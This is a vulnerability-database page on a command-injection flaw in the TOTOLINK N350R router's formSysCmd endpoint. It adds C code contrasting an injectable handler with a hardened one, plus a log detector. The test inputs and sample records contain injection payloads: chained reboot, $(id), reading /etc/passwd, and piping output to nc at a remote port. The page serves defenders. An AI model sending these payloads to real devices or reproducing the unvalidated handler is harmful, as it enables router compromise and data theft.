
CVE-2025-8937

Severity: Low

Published: 14 August 2025
Modified: 29 April 2026
KEV Added: not listed (not in the CISA KEV catalog)
Patch: no vendor patch or advisory referenced
CVSS v4 score: 2.1 (Low). The vector behind this score includes the threat metric E:P (proof-of-concept exploit available), so it is a CVSS-BT (base plus threat) score rather than a pure base score.
CVSS v4 vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P (metrics with the value X, "not defined", omitted)
EPSS score: 0.0172 (82.8th percentile)
Risk Priority: 5 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-8937 is a low-severity Injection (CWE-74) vulnerability in TOTOLINK N350R firmware. Its published CVSS 4.0 score is 2.1 (Low); the vector behind that score includes the threat metric E:P (proof-of-concept exploit), which pulls it below what the base metrics alone would give.

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE's EPSS score places it in the top 17.2% of CVEs by estimated exploit likelihood, and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

A vulnerability has been identified in the TOTOLINK N350R router running firmware version 1.2.3-B20130826. The issue resides in an unspecified portion of the /boafrm/formSysCmd endpoint and stems from improper handling of user-supplied input, resulting in operating-system command injection (classified under CWE-74 and CWE-77). The published CVSS 4.0 vector (AV:N, PR:L, UI:N) describes a flaw reachable over the network that requires an authenticated low-privileged account but no user interaction; the overall score of 2.1 also reflects the threat metric E:P.

An attacker who can authenticate to the device can supply crafted parameters to the affected form handler, causing operating-system commands of the attacker's choosing to execute on the router. The published impact metrics (VC:L/VI:L/VA:L) rate the resulting control as limited: the ability to read, modify, or delete data within the scope of the compromised process. That rating describes the process scope, not the device; the references do not state what privileges the web server process holds. Public proof-of-concept material has already been released, confirming that the attack can be carried out over the network.

The associated EPSS score remains at 0.0172, unchanged since disclosure, indicating no significant increase in observed exploitation interest. The referenced materials consist of exploit documentation hosted on GitHub and the corresponding VulDB entries; no vendor advisory or patch information is included among them.
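The injection described above comes down to a form parameter being spliced into a shell command line. The following is an added example, not TOTOLINK code and not taken from the page's references: a minimal model of a Boa-style CGI handler for /boafrm/formSysCmd in its injectable shape next to a hardened shape that applies the input-validation control (SI-10) named in the summary. The parameter name sysCmd, the fixed verb set and the argument grammar are assumptions for illustration; the page does not name the vulnerable parameter.

```c
/*
 * Added example, not TOTOLINK code: a minimal model of a Boa-style CGI form
 * handler for /boafrm/formSysCmd in its injectable shape and a hardened
 * shape. The parameter name "sysCmd", the fixed verb set and the argument
 * grammar are assumptions for illustration; the page does not name the
 * vulnerable parameter.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

#define CMD_MAX 256

/* Injectable shape: the request parameter is spliced verbatim into a command
 * line that the real handler hands to system(), i.e. to /bin/sh -c. Here the
 * string is only built and returned (static buffer, like a handler's fixed
 * cmd[] array) so the example runs without executing anything. */
const char *build_syscmd_vulnerable(const char *sysCmd)
{
    static char cmd[CMD_MAX];
    /* No validation: ';', '|', '&', '`', '$(' are honoured by the shell, so
     * "ping 127.0.0.1; reboot" executes two commands. */
    snprintf(cmd, sizeof cmd, "%s > /tmp/syscmd.log 2>&1", sysCmd);
    return cmd;
}

/* Hardened shape: an allowlist of verbs, a strict grammar for the single
 * argument, and execution through execvp() with an argv array (no shell). */
static const char *const allowed_verbs[] = { "ping", "ping6" };

/* Accept only hostname / IP-literal characters: letters, digits, '.', '-', ':'.
 * Whitespace, ';', '|', '$', quotes, newlines and anything else are rejected. */
static int host_token_ok(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 253) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':')) return 0;
    }
    return 1;
}

/* Split "verb host" into its two parts; returns 1 only if the verb is
 * allowlisted and the host passes host_token_ok(). */
int parse_syscmd_hardened(const char *sysCmd, char *verb, size_t vlen,
                          char *host, size_t hlen)
{
    const char *sp = strchr(sysCmd, ' ');
    if (sp == NULL) return 0;
    size_t vl = (size_t)(sp - sysCmd);
    if (vl == 0 || vl >= vlen) return 0;
    memcpy(verb, sysCmd, vl);
    verb[vl] = '\0';
    int allowed = 0;
    for (size_t i = 0; i < sizeof allowed_verbs / sizeof allowed_verbs[0]; i++)
        if (strcmp(verb, allowed_verbs[i]) == 0) allowed = 1;
    if (!allowed) return 0;
    const char *arg = sp + 1;
    if (strlen(arg) >= hlen || !host_token_ok(arg)) return 0;
    strcpy(host, arg);
    return 1;
}

/* Convenience wrapper: does the hardened parser accept this input? */
int hardened_accepts(const char *sysCmd)
{
    char verb[16], host[254];
    return parse_syscmd_hardened(sysCmd, verb, sizeof verb, host, sizeof host);
}

/* Execute an already-validated command without a shell. argv is built from
 * validated pieces, so metacharacters in host can never reach /bin/sh.
 * Returns the child's exit status, or -1 on failure. */
int run_syscmd_hardened(const char *verb, const char *host)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)verb, "-c", "1", (char *)host, NULL };
        execvp(verb, argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *inputs[] = { "ping 192.168.0.1", "ping 192.168.0.1; reboot",
                             "ping $(id)", "reboot" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        printf("vulnerable handler would run: sh -c '%s'\n",
               build_syscmd_vulnerable(inputs[i]));
        printf("hardened handler %s: %s\n",
               hardened_accepts(inputs[i]) ? "accepts" : "rejects", inputs[i]);
    }
    return 0;
}
```

The hardened path is positive validation rather than a denylist of metacharacters: the verb must match a fixed set, the argument must match a narrow character class, and the result is passed to execvp() as separate argv entries so no shell ever parses it. A handler that merely strips ';' and '|' would still be bypassable through '$(...)', backticks or newlines; the allowlist grammar rejects all of those by construction. main() only prints what each shape would do; run_syscmd_hardened() is the call the real handler would make after parse_syscmd_hardened() succeeds.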


Vulnerability details

A vulnerability has been found in TOTOLINK N350R 1.2.3-B20130826. This vulnerability affects unknown code of the file /boafrm/formSysCmd. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CWE(s)

CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')
Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assisted mapping)

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.008 Network Device CLI Execution
Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads.
Why these techniques?

Command injection in the router's web management interface (formSysCmd) lets a remote actor exploit the network device when that interface is reachable (T1190); the injected input is then executed by the device's command interpreter, giving the actor arbitrary command execution on it (T1059.008).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1
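The two techniques above are observable at the management interface: every request to /boafrm/formSysCmd is a potential T1190 event, and a request whose parameter values carry shell metacharacters is the injection itself. The following is an added example, not part of the page or of any vendor tooling, that triages request records for that endpoint. The record format ("METHOD PATH[?query] [body]", one per line, with the URL-encoded body captured by a reverse proxy or WAF in front of the router), the parameter names sysCmd and submit-url, and the sample records are constructed assumptions; Boa's own access log does not record POST bodies, so the body check only applies where something in the path captures it.

```c
/*
 * Added example, not part of the page or of any vendor tooling: triage of
 * management-plane request records for the endpoint the advisory names,
 * /boafrm/formSysCmd. The record format ("METHOD PATH[?query] [body]", one per
 * line, URL-encoded body captured by a reverse proxy or WAF in front of the
 * router) and the parameter names sysCmd / submit-url are constructed
 * assumptions; Boa's own access log does not record POST bodies.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

enum verdict { V_IGNORE = 0, V_REVIEW = 1, V_ALERT = 2 };

/* Percent-decode one form value ('+' becomes ' '). Returns 0 if out is too small. */
static int url_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (o + 1 >= outlen) return 0;
        if (in[i] == '%' && isxdigit((unsigned char)in[i + 1])
                         && isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            out[o++] = (in[i] == '+') ? ' ' : in[i];
        }
    }
    out[o] = '\0';
    return 1;
}

/* Characters /bin/sh -c treats as separators, redirection or substitution. */
static int has_shell_metachar(const char *s)
{
    return strpbrk(s, ";|&`$<>(){}\n\r") != NULL;
}

/* Split a form body on '&' first, then decode each value. Decoding the whole
 * body at once would flag every multi-parameter request because of the
 * literal '&' separators; splitting first means a %26 inside a value still
 * decodes to '&' and is flagged, while separators are not. */
static int form_has_injection(const char *form)
{
    char copy[512], decoded[512];
    strncpy(copy, form, sizeof copy - 1);
    copy[sizeof copy - 1] = '\0';
    for (char *tok = strtok(copy, "&"); tok != NULL; tok = strtok(NULL, "&")) {
        char *eq = strchr(tok, '=');
        const char *value = eq ? eq + 1 : tok;
        if (url_decode(value, decoded, sizeof decoded) && has_shell_metachar(decoded))
            return 1;
    }
    return 0;
}

/* ALERT: a formSysCmd request whose query or body value carries shell
 * metacharacters (T1190 exploitation attempt leading to T1059.008).
 * REVIEW: any other formSysCmd hit; the endpoint runs system commands by
 * design, so each legitimate use should be attributable to an administrator.
 * IGNORE: every other path. */
int classify_record(const char *line)
{
    char method[8], path[512], body[512];
    body[0] = '\0';
    int n = sscanf(line, "%7s %511s %511s", method, path, body);
    if (n < 2) return V_IGNORE;
    if (strncmp(path, "/boafrm/formSysCmd", 18) != 0) return V_IGNORE;
    const char *query = strchr(path, '?');
    if (query != NULL && form_has_injection(query + 1)) return V_ALERT;
    if (n == 3 && form_has_injection(body)) return V_ALERT;
    return V_REVIEW;
}

/* How many records in a set received the given verdict. */
int count_verdicts(const char *const *records, int nrec, int want)
{
    int hits = 0;
    for (int i = 0; i < nrec; i++)
        if (classify_record(records[i]) == want) hits++;
    return hits;
}

/* Constructed sample records (not captured from a real device). */
const char *const sample_records[] = {
    "POST /boafrm/formSysCmd sysCmd=ping+127.0.0.1&submit-url=%2Fsyscmd.htm",
    "POST /boafrm/formSysCmd sysCmd=ping+127.0.0.1%3Bcat+%2Fetc%2Fpasswd&submit-url=%2Fsyscmd.htm",
    "POST /boafrm/formSysCmd sysCmd=%24%28reboot%29",
    "GET /boafrm/formSysCmd?sysCmd=id%7Cnc+10.0.0.5+4444",
    "GET /index.htm",
    "POST /boafrm/formLogin username=admin&password=%24ecret",
};
const int sample_record_count = (int)(sizeof sample_records / sizeof sample_records[0]);

int main(void)
{
    static const char *const names[] = { "IGNORE", "REVIEW", "ALERT" };
    for (int i = 0; i < sample_record_count; i++)
        printf("%-6s %s\n", names[classify_record(sample_records[i])], sample_records[i]);
    return 0;
}
```

Decoding happens per value after splitting on the raw '&' separators; the order matters, because a detector that decodes the whole body first either floods on every multi-parameter form or has to special-case the separator. The REVIEW verdict for clean formSysCmd hits is deliberate: with a public proof of concept and an authenticated attack path, the useful question for this endpoint is not only "was it attacked" but "who legitimately used it", so each hit should be matched against an administrator session.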

CVEs Like This One

CVE-2026-5020 (same vendor: TOTOLINK)
CVE-2026-1548 (same vendor: TOTOLINK)
CVE-2026-1326 (same vendor: TOTOLINK)
CVE-2026-5030 (same vendor: TOTOLINK)
CVE-2026-5178 (same vendor: TOTOLINK)
CVE-2026-1150 (same vendor: TOTOLINK)
CVE-2026-5105 (same vendor: TOTOLINK)
CVE-2026-5176 (same vendor: TOTOLINK)
CVE-2025-9935 (same vendor: TOTOLINK)
CVE-2025-7615 (same vendor: TOTOLINK)

Affected Assets

Vendor: TOTOLINK
Product: N350R firmware
Version: 1.2.3-B20130826

Mitigating Controls (NIST 800-53 r5, AI-assisted mapping)

SI-10 Information Input Validation (prevent)
Directly requires validation of inputs to the /boafrm/formSysCmd endpoint to block command-injection strings before they reach the underlying system command processor.

Access enforcement on the handler (prevent)
Enforces access-control decisions on the formSysCmd handler so that only explicitly authorized subjects can invoke the command-execution path.

SI-2 Flaw Remediation (prevent)
Requires timely application of vendor patches or firmware updates that eliminate the command-injection flaw in formSysCmd; at the time of this record no vendor patch is referenced, so this control cannot yet be applied.
